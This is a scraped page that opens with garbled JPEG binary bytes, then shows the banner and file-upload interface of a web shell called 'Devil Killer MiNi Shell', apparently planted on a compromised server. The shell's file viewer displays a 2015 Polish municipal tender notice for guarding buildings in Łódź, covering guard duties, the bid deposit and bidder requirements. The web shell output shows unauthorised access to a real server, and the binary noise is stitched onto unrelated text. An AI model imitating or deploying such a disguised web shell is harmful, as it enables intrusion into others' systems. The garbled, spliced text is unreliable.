JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150123/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150123/10129-N-2015.html

<p class="kh_header"><b>Łódź: usługa stałej bezpośredniej ochrony fizycznej budynków i mienia obiektów w nieruchomościach administrowanych przez Zamawiającego</b><br>
<b>Numer ogłoszenia: 10129 - 2015; data zamieszczenia: 23.01.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Administracja Zasobów Komunalnych Łódź-Śródmieście , ul. Piotrkowska 86, 90-103 Łódź, woj. łódzkie, tel. 42 630 08 06, faks 42 630 08 08.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.srodmiescie.azk.lodz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> usługa stałej bezpośredniej ochrony fizycznej budynków i mienia obiektów w nieruchomościach administrowanych przez Zamawiającego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa stałej bezpośredniej ochrony fizycznej budynków i mienia obiektów w nieruchomościach administrowanych przez Zamawiającego, na warunkach określonych w projektach umów - załączniki do Specyfikacji Istotnych Warunków Zamówienia   z podziałem na dwie części:
Część  I   - Al. Kościuszki 19/Wólczańska 36 (nieruchomość użyteczności publicznej), 
Część  II  - ul. Ogrodowa 24 (nieruchomość mieszkalna do rewitalizacji w programie Miasto Kamienic.                                                                                 Świadczenie usługi stałej, bezpośredniej ochrony fizycznej mienia budynków i terenu  nieruchomości użyteczności publicznej, położonej w Łodzi przy Al. Kościuszki 19. 
- Ochronie podlegają budynki i teren podwórza,
- Dostęp do podwórza - zabezpieczenie stanowi zamykana brama.
Ochrona obiektu - całodobowo przez jednego pracownika w dni robocze, świąteczne i wolne od pracy :
1. Pracownicy ochrony (dozoru) wyposażeni zgodnie z obowiązującymi wymogami prawa stanowią element bezpośredniego i fizycznego zabezpieczenia obiektu przed jego zniszczeniem, uszkodzeniem lub kradzieżą znajdującego się w nim mienia Zamawiającego, oraz penetracją osób trzecich.
2. Nadzór merytoryczny nad całością pracowników, realizacją zadań ochronnych oraz właściwym wywiązywaniem się z obowiązków służbowych z ramienia Wykonawcy sprawuje pracownik uprawniony do przyjmowania uwag, wniosków, korygowania i uaktualniania zadań oraz wprowadzania zmian.
3. Do ogólnych obowiązków pracowników ochrony należy w szczególności:
a/ W związku z podjęciem pracy /wykonywaniem zlecenia w zakresie zadań ochrony fizycznej tj. wykonywanie powierzonych zadań/obowiązków/ i czynności zgodnie z przepisami prawa oraz ustaleniami wewnętrznymi kierownictwa zakładu.
b/ Reagowanie i podejmowanie natychmiastowych działań ochronnych wynikających z ustawy  o ochronie osób i mienia oraz przepisów wykonawczych.
c/ Rzetelne i na bieżąco dokumentowanie podejmowanych i wykonywanych czynności ochronnych w Książce przebiegu służby i innej dokumentacji.
d/ Dbałość o właściwy wygląd zewnętrzny wyrażająca się noszeniem prawidłowego, kompletnego i czystego umundurowania oraz regulaminowych oznaczeń i identyfikatora, oraz legitymację pracowniczą.
e/ Ścisłe przestrzeganie przepisów BHP i ppoż. oraz wydanych na ich podstawie zarządzeń  regulaminów.
f/ Dopilnowanie stałego i należytego porządku na terenie chronionego obiektu.
g/ Wykonywanie wszystkich czynności określonych doraźnie przez Zamawiającego lub upoważnionego przedstawiciela.
h/ Utrzymywanie miejsca pełnienia służby w należytym porządku, przekazanie sprawnego sprzętu  i wyposażenia zmiennikowi.
i/ Podczas przekazania dyżuru pracownik ochrony (dozoru) obowiązkowo dokonuje przeglądu ochranianego obiektu, ze zwróceniem szczególnej uwagi na: 
- stan zabezpieczenia drzwi,
- stan zabezpieczenia okien,
- stan zabezpieczenia bramy wjazdowej.
j/ Niezwłoczne przekazywanie bezpośredniemu przełożonemu informacji o pojawiających się zagrożeniach w czasie pełnionego dyżuru.
k/utrzymywanie łączności za pomocą środków łączności bezprzewodowej z siedzibą firmy.
l/ Interweniowanie do organów ścigania w przypadku zakłócenia ustalonego porządku w chronionym obiekcie i jego rejonie.
ł/ W przypadku stwierdzenia włamania (kradzieży) natychmiastowe powiadomienie swoich przełożonych (a na ich polecenie powiadomienie policji) oraz zabezpieczenie śladów włamania.
m/ Współdziałanie z policją i strażą miejską oraz strażą pożarną podczas prowadzenia na terenie obiektu akcji interwencyjnej, gaśniczej itp.
n/ W przypadku anonimowego telefonu o podłożeniu lub znalezieniu ładunku wybuchowego natychmiastowe powiadomienie kierownika obiektu i przekazanie treści rozmowy o podłożeniu ładunku.
4. Podczas ochrony obiektu pracownikom ochrony (dozoru) zabrania się:
- pełnienia służby po spożyciu alkoholu;
- spożywania alkoholu lub środków odurzających podczas służby;
- wykonywania czynności nie związanych z ochroną obiektu i utrzymaniem należytego porządku na   jego terenie lub należących do obowiązków personelu Zamawiającego i nie przewidzianych w Umowie i niniejszym załączniku: 
- opuszczanie obiektu bez zgody Zamawiającego lub przekazania zadań dla zmiennika poza ustalonymi godzinami zdawania i przejmowania służby bez wiedzy Zamawiającego, 
- spania podczas pełnienia służby;
- palenia tytoniu w pomieszczeniu pełnienia służby.
- wykonywanie innych niż w załączniku czynności bez uprzednio uzyskanej zgody Zamawiającego  i Wykonawcy:
- odbywania prywatnych spotkań ze znajomymi i krewnymi na terenie chronionego obiektu;
- oglądania TV,itp. w czasie wykonywania zadań ochronnych, 
- niszczenia wyposażenia miejsca pełnienia służby stanowiącego własność Zamawiającego i przekazanego do dyspozycji Wykonawcy na czas trwania umowy.
5. Ubiór pracownika ochrony:
Pracownik ochrony powinien być ubrany schludnie i czysto w sorty mundurowe oznakowane logiem firmy. Identyfikator firmy musi być umieszczony w miejscu widocznym przez cały okres pełnienia dyżuru. Obuwie winno być wygodne niedopuszczalne jest pełnienie służby w sandałach, klapkach itp.
6.Inne ustalenia
a/ Pracownik ochrony ma obowiązek prowadzić na bieżąco Książkę przebiegu służby w której należy dokonywać wszelkich wpisów dotyczących:
- wszystkich zdarzeń mogących mieć wpływ na bezpieczeństwo ochranianego obiektu z podaniem godzin i okoliczności towarzyszących;
- podjętych czynności wykonanych w celu wyeliminowania zagrożenia,
- sposobu alarmowania o stanie zagrożenia i powiadamianie przedstawicieli Zamawiającego oraz 
właściwych służb publicznych.
b/  Książka przebiegu służby jest przechowywana na terenie ochranianego obiektu.
Zamawiający lub jego pełnomocnik mają prawo i obowiązek wpisywania w  Książce przebiegu służby swoich poleceń lub uwag dotyczących toku pełnienia służby, mają prawo do codziennego kontrolowania wszystkich wykonanych zapisów na służbie strażnika ochrony.
c/ Pracownik ochrony ma obowiązek prowadzić na bieżąco Książkę ruchu pojazdów.
UWAGA:
O wszystkich szczególnych przypadkach i podjętych działaniach w czasie wykonywania zadań ochronnych należy bezwzględnie poinformować Zamawiającego i Wykonawcę. 

Świadczenie usługi stałej, bezpośredniej ochrony fizycznej mienia budynków mieszkalnych nieruchomości położonej w Łodzi przy ul. Ogrodowej  24 przeznaczonej do rewitalizacji w programie Miasto Kamienic. 
 
1.Ochrona będzie sprawowana przez 3 pracowników ochrony w tym:  1 pracownik w godz. od 06.00 do 15.00, 2 pracowników od 15.00 do 18.00 i 3 pracowników  od 18.00 do 06.00)  Obiekt będzie ochraniany przez 24godz./dobę przez wszystkie dni w tygodniu. 
2.Ochronie podlegają budynki i teren podwórza,
3. Pracownicy ochrony (dozoru) wyposażeni zgodnie z obowiązującymi wymogami prawa stanowią element bezpośredniego i fizycznego zabezpieczenia obiektu przed jego zniszczeniem, uszkodzeniem lub kradzieżą znajdującego się w nim mienia Zamawiającego, oraz penetracją osób trzecich.
4. Nadzór merytoryczny nad całością pracowników, realizacją zadań ochronnych oraz właściwym wywiązywaniem się z obowiązków służbowych z ramienia Wykonawcy sprawuje pracownik uprawniony do przyjmowania uwag, wniosków, korygowania i uaktualniania zadań oraz wprowadzania zmian.
5. Do ogólnych obowiązków pracowników ochrony należy w szczególności:
a/ W związku z podjęciem pracy /wykonywaniem zlecenia w zakresie zadań ochrony fizycznej tj. wykonywanie powierzonych zadań/obowiązków/ i czynności zgodnie z przepisami prawa oraz ustaleniami wewnętrznymi kierownictwa zakładu.
b/ Reagowanie i podejmowanie natychmiastowych działań ochronnych wynikających z ustawy  o ochronie osób i mienia oraz przepisów wykonawczych.
c/ Rzetelne i na bieżąco dokumentowanie podejmowanych i wykonywanych czynności ochronnych w Książce przebiegu służby i innej dokumentacji.
d/ Dbałość o właściwy wygląd zewnętrzny wyrażająca się noszeniem prawidłowego, kompletnego i czystego umundurowania oraz regulaminowych oznaczeń i identyfikatora, oraz legitymację pracowniczą.
e/ Ścisłe przestrzeganie przepisów BHP i ppoż. oraz wydanych na ich podstawie zarządzeń  regulaminów.
f/ Dopilnowanie stałego i należytego porządku na terenie chronionego obiektu.
g/ Wykonywanie wszystkich czynności określonych doraźnie przez Zamawiającego lub upoważnionego przedstawiciela.
h/ Utrzymywanie miejsca pełnienia służby w należytym porządku, przekazanie sprawnego sprzętu  i wyposażenia zmiennikowi.
i/ Podczas przekazania dyżuru pracownik ochrony (dozoru) obowiązkowo dokonuje przeglądu ochranianego obiektu, ze zwróceniem szczególnej uwagi na: 
- stan zabezpieczenia drzwi,
- stan zabezpieczenia okien,
- stan zabezpieczenia bramy wjazdowej.
j/ Niezwłoczne przekazywanie bezpośredniemu przełożonemu informacji o pojawiających się zagrożeniach w czasie pełnionego dyżuru.
k/utrzymywanie łączności za pomocą środków łączności bezprzewodowej z siedzibą firmy.
l/ Interweniowanie do organów ścigania w przypadku zakłócenia ustalonego porządku w chronionym obiekcie i jego rejonie.
ł/ W przypadku stwierdzenia włamania (kradzieży) natychmiastowe powiadomienie swoich przełożonych (a na ich polecenie powiadomienie policji) oraz zabezpieczenie śladów włamania.
m/ Współdziałanie z policją i strażą miejską oraz strażą pożarną podczas prowadzenia na terenie obiektu akcji interwencyjnej, gaśniczej itp.
n/ W przypadku anonimowego telefonu o podłożeniu lub znalezieniu ładunku wybuchowego natychmiastowe powiadomienie kierownika obiektu i przekazanie treści rozmowy o podłożeniu ładunku.
6. Podczas ochrony obiektu pracownikom ochrony (dozoru) zabrania się:
- pełnienia służby po spożyciu alkoholu;
- spożywania alkoholu lub środków odurzających podczas służby;
- wykonywania czynności nie związanych z ochroną obiektu i utrzymaniem należytego porządku na   jego terenie lub należących do obowiązków personelu Zamawiającego i nie przewidzianych w Umowie  i niniejszym załączniku: 
- opuszczanie obiektu bez zgody Zamawiającego lub przekazania zadań dla zmiennika poza ustalonymi godzinami zdawania i przejmowania służby bez wiedzy Zamawiającego, 
- spania podczas pełnienia służby;
- palenia tytoniu w pomieszczeniu pełnienia służby.
- wykonywanie innych niż w załączniku czynności bez uprzednio uzyskanej zgody Zamawiającego i Wykonawcy:
- odbywania prywatnych spotkań ze znajomymi i krewnymi na terenie chronionego obiektu;
- oglądania TV,itp. w czasie wykonywania zadań ochronnych, 
- niszczenia wyposażenia miejsca pełnienia służby stanowiącego własność Zamawiającego i przekazanego do dyspozycji Wykonawcy na czas trwania umowy.
7. Ubiór pracownika ochrony:
Pracownik ochrony powinien być ubrany schludnie i czysto w sorty mundurowe oznakowane logiem firmy. Identyfikator firmy musi być umieszczony w miejscu widocznym przez cały okres pełnienia dyżuru. Obuwie winno być wygodne niedopuszczalne jest pełnienie służby w sandałach, klapkach itp.
8.Inne ustalenia
a/ Pracownik ochrony ma obowiązek prowadzić na bieżąco Książkę przebiegu służby w której należy dokonywać wszelkich wpisów dotyczących:
- wszystkich zdarzeń mogących mieć wpływ na bezpieczeństwo ochranianego obiektu z podaniem godzin i okoliczności towarzyszących;
- podjętych czynności wykonanych w celu wyeliminowania zagrożenia,
- sposobu alarmowania o stanie zagrożenia i powiadamianie przedstawicieli Zamawiającego oraz 
właściwych służb publicznych.
b/  Książka przebiegu służby jest przechowywana na terenie ochranianego obiektu.
Zamawiający lub jego pełnomocnik mają prawo i obowiązek wpisywania w  Książce przebiegu służby swoich poleceń lub uwag dotyczących toku pełnienia służby, mają prawo do codziennego kontrolowania wszystkich wykonanych zapisów na służbie strażnika ochrony.
c/ Pracownik ochrony ma obowiązek prowadzić na bieżąco Książkę ruchu pojazdów.
UWAGA:
O wszystkich szczególnych przypadkach i podjętych działaniach w czasie wykonywania zadań ochronnych należy bezwzględnie poinformować Zamawiającego i Wykonawcę..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających o którym mowa w art. 67 ust. 1  pkt 6 ustawy  Prawo zamówień publicznych stanowiących nie więcej niż 50 % wartości zamówienia podstawowego .</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 16.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zgodnie z zapisem art. 45 ust. 2 i 4 Ustawy Prawo zamówień publicznych Zamawiający wymaga wniesienia przez Wykonawcę wadium dla każdej części osobno tj.:
- dla części I   - w wysokości:    1 000,00 zł. 
- dla części  II  - w wysokości:   1 000,00 zł.
Wadium wnosi się przed upływem terminu składania ofert, przy czym za termin wniesienia wadium w formie pieniężnej przyjmuje się termin uznania na rachunku bankowym Zamawiającego .
2. Wadium może być wniesione w jednej lub kilku następujących formach:
-  pieniądzu,
- poręczeniach bankowych, lub poręczeniach spółdzielczej kasy oszczędnościowo kredytowej,
 z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
- gwarancjach bankowych,
- gwarancjach ubezpieczeniowych,
- poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 
9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, 
poz. 1158 oraz z 2002 r. Nr 25, poz. 253, Nr 66, poz. 596 i Nr 216, poz. 1824).
3. Wadium w formie pieniądza należy wnieść przelewem na konto w Banku Getin Bank SA 
nr rachunku 35 1560 0013 2376 1236 0000 0005, z dopiskiem na przelewie: Ochrona -  
część nr ......... 
4. Zamawiający zaleca, aby w przypadku wniesienia wadium w formie:
- pieniężnej dokument potwierdzający wniesienie wadium został załączony do oferty,
- innej niż pieniądz, oryginał dokumentu został złożony w oddzielnej kopercie, a jego kopia 
w ofercie.
5. Z treści gwarancji/poręczenia winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a oraz ust. 5 ustawy Prawo zamówień publicznych.
6. Wykonawca, który nie wniesie wadium lub nie zabezpieczy oferty akceptowalną formą wadium zostanie wykluczony z postępowania, a jego oferta zostanie uznana za odrzuconą.
7. Okoliczności i zasady zwrotu wadium, jego przepadku oraz zasady jego zaliczenia na poczet 
zabezpieczenia należytego wykonania umowy określa ustawa Prawo zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek, jeśli przedstawi ważną na okres wykonywania zamówienia koncesję Ministra Spraw Wewnętrznych i Administracji wydaną na podstawie ustawy z dnia 22 sierpnia 1997r. o ochronie osób i mienia (Dz. U. z 2005r., Nr 145 poz. 1221 z późn. zm.)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni ww. warunek w sytuacji, kiedy wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał lub wykonuje co najmniej 2 usługi odpowiadającą swoim rodzajem usłudze stanowiącej przedmiot zamówienia  obejmującej okres co najmniej 6 miesięcy, świadczonej w sposób ciągły o wartości łącznej brutto co najmniej 50.000,00 zł. dla jednej części zamówienia. 

UWAGA:  W przypadku ubiegania się o realizację więcej niż jednej części Wykonawca winien wykazać wykonanie usług ochrony mienia odpowiadającej sumie wymaganych usług dla danych części.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni ww. warunek w sytuacji, kiedy wykaże, że dysponuje telefonami komórkowymi w które zostaną wyposażeni pracownicy ochrony  na każdą nieruchomość objętą zamówieniem,  tj. 
-	dla części I   - 2 telefony komórkowe
-	dla części II  - 4 telefony komórkowe
UWAGA: W przypadku ubiegania się o realizację więcej niż jednej części Wykonawca winien wykazać dysponowanie ilością telefonów komórkowych odpowiadającą sumie sztuk wymaganych dla danych części.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać także, że dysponuje osobami, zdolnymi do wykonania zamówienia tj: 
- minimum 1 osobą -  (może być właściciel) upoważnioną przez Wykonawcę do kontaktów  z Zamawiającym w trakcie realizacji zamówienia, odpowiedzialną za terminowe i prawidłowe wykonanie zamówienia ,oraz: 
-	dla części I  -  minimum  4 pracowników ochrony, 
-	dla części II  - minimum 6 pracowników ochrony. 
UWAGA:  W przypadku ubiegania się o realizację więcej niż jednej części Wykonawca winien wykazać dysponowanie ilością osób odpowiadającą sumie osób wymaganych dla danej części.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni ww. warunek w sytuacji, kiedy wykaże, że jest ubezpieczony od odpowiedzialności 
cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia tj. ochrony mienia na sumę ubezpieczenia w wysokości co najmniej  1 000 000,00 zł. przy składaniu oferty na jedną część zamówienia.

Jeżeli Wykonawca składa ofertę na więcej niż jedną część zamówienia to winien wykazać się
wartością ubezpieczenia dla ilości części na które składa ofertę.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

